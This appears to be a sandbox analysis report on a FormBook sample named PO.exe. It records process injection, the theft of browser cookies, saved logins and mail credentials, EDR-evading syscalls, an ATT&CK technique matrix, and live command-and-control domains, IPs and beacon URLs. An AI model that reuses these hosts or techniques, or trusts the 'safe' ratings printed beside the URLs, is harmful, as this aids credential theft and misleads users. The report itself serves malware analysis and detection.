                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3001987219.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3003697143.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2274480081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3003263592.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275144613.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3003792289.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3003894654.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2276815153.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3001987219.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3003697143.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2274480081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3003263592.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275144613.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3003792289.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3003894654.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2276815153.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                412
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism
                1
                Disable or Modify Tools
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612356 Sample: PO.exe Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 31 www.erectus.xyz 2->31 33 www.globalcase.website 2->33 35 3 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 4 other signatures 2->53 10 PO.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\AppData\Local\...\PO.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 PO.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 vfAu7gBmmnuGpQ5Y.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 net.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 vfAu7gBmmnuGpQ5Y.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.globalcase.website 192.64.118.221, 50018, 50019, 50020 NAMECHEAP-NETUS United States 23->37 39 www.fineitemrealm.shop 162.210.195.109, 49995, 50011, 50016 LEASEWEB-USA-WDCUS United States 23->39 41 3 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                PO.exe69%VirustotalBrowse
                PO.exe68%ReversingLabsWin32.Trojan.Leonem
                PO.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.adjokctp.icu0%Avira URL Cloudsafe
                http://www.globalcase.website/6wg4/?92tD=e2yux1VtJoqvcqg+8AukcEcVwMVT+Sjl/1eDxHdMS7mzrr0SxU8linEjJM3sYoPzrw66qF8Oj5XhrJTjkHQqvun9I0YvCDnVTdCWSCRzvr5pslrpMRangDo=&ODj=aVdxTb0%Avira URL Cloudsafe
                http://www.adjokctp.icu/wurw/0%Avira URL Cloudsafe
                http://www.cloud-kuprof2.click/9kj6/?92tD=AVccbOSLL/+N4XgwVpb4SHGSnAGJIc2w8rOLkxaC3AvUfASlWswjdaveGA5SPzmQwtpsnNNz41sXTUjryKzeRTK3cv4i7oHGDeN1DGdqMP4Wc9jKpdKBVJQ=&ODj=aVdxTb0%Avira URL Cloudsafe
                http://www.fineitemrealm.shop/c3c5/?92tD=2X6TFJqSBkan8qpDKqB3foPaC+q2tUyYHYLE9NMufHiS9CuR8q99XAqJ5/x0mYnwttbXYsDuQMFmGta9SThVpupVHhzg9UTUXnuJin70LkdCs8vRTrMDdWY=&ODj=aVdxTb0%Avira URL Cloudsafe
                http://www.fineitemrealm.shop/c3c5/0%Avira URL Cloudsafe
                http://www.erectus.xyz/cjko/?92tD=3gJzY2hwuTATu+wgM7M2aW4tC9U6eyI05FbsBlp+k+3zOYzda5y9e/SDhnP1PIg0Yh4jO5HOCpt/RLpJrfWBqfOHUxMMiqNoXrahRjaCwOMkcSKIcBEhJK4=&ODj=aVdxTb0%Avira URL Cloudsafe
                http://www.erectus.xyz/cjko/0%Avira URL Cloudsafe
                http://www.sakkal.com(60%Avira URL Cloudsafe
                http://www.globalcase.website/6wg4/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.fineitemrealm.shop
                162.210.195.109
                truefalse
                  high
                  www.adjokctp.icu
                  104.21.35.208
                  truefalse
                    high
                    www.erectus.xyz
                    13.248.169.48
                    truefalse
                      high
                      www.cloud-kuprof2.click
                      57.129.59.27
                      truefalse
                        high
                        www.globalcase.website
                        192.64.118.221
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://www.globalcase.website/6wg4/?92tD=e2yux1VtJoqvcqg+8AukcEcVwMVT+Sjl/1eDxHdMS7mzrr0SxU8linEjJM3sYoPzrw66qF8Oj5XhrJTjkHQqvun9I0YvCDnVTdCWSCRzvr5pslrpMRangDo=&ODj=aVdxTbfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.adjokctp.icu/wurw/true
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fineitemrealm.shop/c3c5/?92tD=2X6TFJqSBkan8qpDKqB3foPaC+q2tUyYHYLE9NMufHiS9CuR8q99XAqJ5/x0mYnwttbXYsDuQMFmGta9SThVpupVHhzg9UTUXnuJin70LkdCs8vRTrMDdWY=&ODj=aVdxTbfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.cloud-kuprof2.click/9kj6/?92tD=AVccbOSLL/+N4XgwVpb4SHGSnAGJIc2w8rOLkxaC3AvUfASlWswjdaveGA5SPzmQwtpsnNNz41sXTUjryKzeRTK3cv4i7oHGDeN1DGdqMP4Wc9jKpdKBVJQ=&ODj=aVdxTbfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.globalcase.website/6wg4/false
                          • Avira URL Cloud: safe
                          unknown
                          http://www.erectus.xyz/cjko/?92tD=3gJzY2hwuTATu+wgM7M2aW4tC9U6eyI05FbsBlp+k+3zOYzda5y9e/SDhnP1PIg0Yh4jO5HOCpt/RLpJrfWBqfOHUxMMiqNoXrahRjaCwOMkcSKIcBEhJK4=&ODj=aVdxTbfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fineitemrealm.shop/c3c5/false
                          • Avira URL Cloud: safe
                          unknown
                          http://www.erectus.xyz/cjko/false
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.adjokctp.icuvfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003263592.0000000000D37000.00000040.80000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://duckduckgo.com/chrome_newtabnet.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.apache.org/licenses/LICENSE-2.0PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers/?PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/bThePO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.iconet.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designers?PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.tiro.comPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designersPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.goodfont.co.krPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.ecosia.org/newtab/net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.carterandcone.comlPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.sajatypeworks.comPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.typography.netDPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ac.ecosia.org/autocomplete?q=net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.fontbureau.com/designers/cabarga.htmlNPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.founder.com.cn/cn/cThePO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.galapagosdesign.com/staff/dennis.htmPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.founder.com.cn/cnPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.fontbureau.com/designers/frere-user.htmlPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnet.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.jiyu-kobo.co.jp/PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.galapagosdesign.com/DPleasePO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.fontbureau.com/designers8PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.fonts.comPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.sandoll.co.krPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.urwpp.deDPleasePO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.zhongyicts.com.cnPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.sakkal.comPO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.sakkal.com(6PO.exe, 00000000.00000002.1792334257.0000000005964000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              192.64.118.221
                                                                                              www.globalcase.websiteUnited States
                                                                                              22612NAMECHEAP-NETUSfalse
                                                                                              13.248.169.48
                                                                                              www.erectus.xyzUnited States
                                                                                              16509AMAZON-02USfalse
                                                                                              104.21.35.208
                                                                                              www.adjokctp.icuUnited States
                                                                                              13335CLOUDFLARENETUSfalse
                                                                                              57.129.59.27
                                                                                              www.cloud-kuprof2.clickBelgium
                                                                                              2686ATGS-MMD-ASUSfalse
                                                                                              162.210.195.109
                                                                                              www.fineitemrealm.shopUnited States
                                                                                              30633LEASEWEB-USA-WDCUSfalse
                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                              Analysis ID:1612356
                                                                                              Start date and time:2025-02-11 18:50:39 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 9m 22s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:9
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:2
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:PO.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/2@5/5
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 75%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 94%
                                                                                              • Number of executed functions: 127
                                                                                              • Number of non-executed functions: 310
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 2.19.106.160, 172.202.163.200, 13.107.253.45
                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target vfAu7gBmmnuGpQ5Y.exe, PID 3220 because it is empty
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                              TimeTypeDescription
                                                                                              12:51:40API Interceptor1x Sleep call for process: PO.exe modified
                                                                                              12:53:08API Interceptor337498x Sleep call for process: net.exe modified
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              192.64.118.221QCX ender user 2025.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.topked.top/g9qz/
                                                                                              Updated 2025 Trading Agreement for Direct Purchase.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.nexave.live/g9oo/
                                                                                              Documents.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.smartath.site/gn2m/
                                                                                              SOA - Final Payment.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.topked.top/g9qz/
                                                                                              swift copy.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.vibrantoul.life/pp15/
                                                                                              SOA-CAVER.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.topked.top/g9qz/
                                                                                              PO 564787YTSH.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.infiniteture.xyz/9s0n/?AvfPLv6=bqDLOh3QLnlqS3shfAx8tJAVyKUjgMknIYXastOCZKWE7q0ObDVixEYWAoa36VYY3prSZOqwe0tPcZBTiAcAMWicaVPwa7FZ9Dtcs8QoD+KUrgNbTA==&uF=ithpsd
                                                                                              order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.vibrantoul.life/pp15/
                                                                                              Updated Price List for 2025 Business Year.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.nexave.live/g9oo/
                                                                                              PO#910663595.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.trueessence.site/bnc8/
                                                                                              13.248.169.48SOA - Final Payment.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.physicsbrain.xyz/i9o2/?4J=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lsp5mJoJ4HYPoeUMJkyf7J+YlHSS38A==&pd=qdUp
                                                                                              BINATONE LLC RFQ.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                              • www.meacci.xyz/ieqn/
                                                                                              REVISED PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.gnolls.xyz/d6sm/
                                                                                              JJ0tnjLiDS.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.bitcoinvendor.xyz/1lt7/
                                                                                              QCX ender user 2025.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.autonomousrich.xyz/5l58/
                                                                                              crypt.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.brothersharetender.xyz/rbx9/
                                                                                              Purchase Order No. STPL014724.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.prepaidbitcoin.xyz/yz57/
                                                                                              Updated 2025 Trading Agreement for Direct Purchase.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.shibbets.xyz/r026/
                                                                                              Confirmation Receipt for ETF_20250211_HSBCEU314AX51920DEU.vbeGet hashmaliciousFormBookBrowse
                                                                                              • www.hotethereum.xyz/t7vo/
                                                                                              06OJsSI8WG.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.satoshichecker.xyz/2inw/
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              www.fineitemrealm.shop2363104503_4202741358 - QUOTE-.exeGet hashmaliciousFormBookBrowse
                                                                                              • 162.210.195.109
                                                                                              PO-000001405.exeGet hashmaliciousFormBookBrowse
                                                                                              • 162.210.195.109
                                                                                              Purchase Order.htaGet hashmaliciousFormBookBrowse
                                                                                              • 162.210.195.109
                                                                                              pappy.ps1Get hashmaliciousFormBookBrowse
                                                                                              • 162.210.195.109
                                                                                              em3.ps1Get hashmaliciousFormBookBrowse
                                                                                              • 162.210.195.109
                                                                                              www.erectus.xyzswift copy.exeGet hashmaliciousFormBookBrowse
                                                                                              • 13.248.169.48
                                                                                              order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                              • 13.248.169.48
                                                                                              BJKzw4jO7c.exeGet hashmaliciousFormBookBrowse
                                                                                              • 13.248.169.48
                                                                                              8BU0MOmoNl.exeGet hashmaliciousFormBookBrowse
                                                                                              • 13.248.169.48
                                                                                              Gd3lOevK672JYIK.zip.exeGet hashmaliciousFormBookBrowse
                                                                                              • 13.248.169.48
                                                                                              SOA.exeGet hashmaliciousFormBookBrowse
                                                                                              • 13.248.169.48
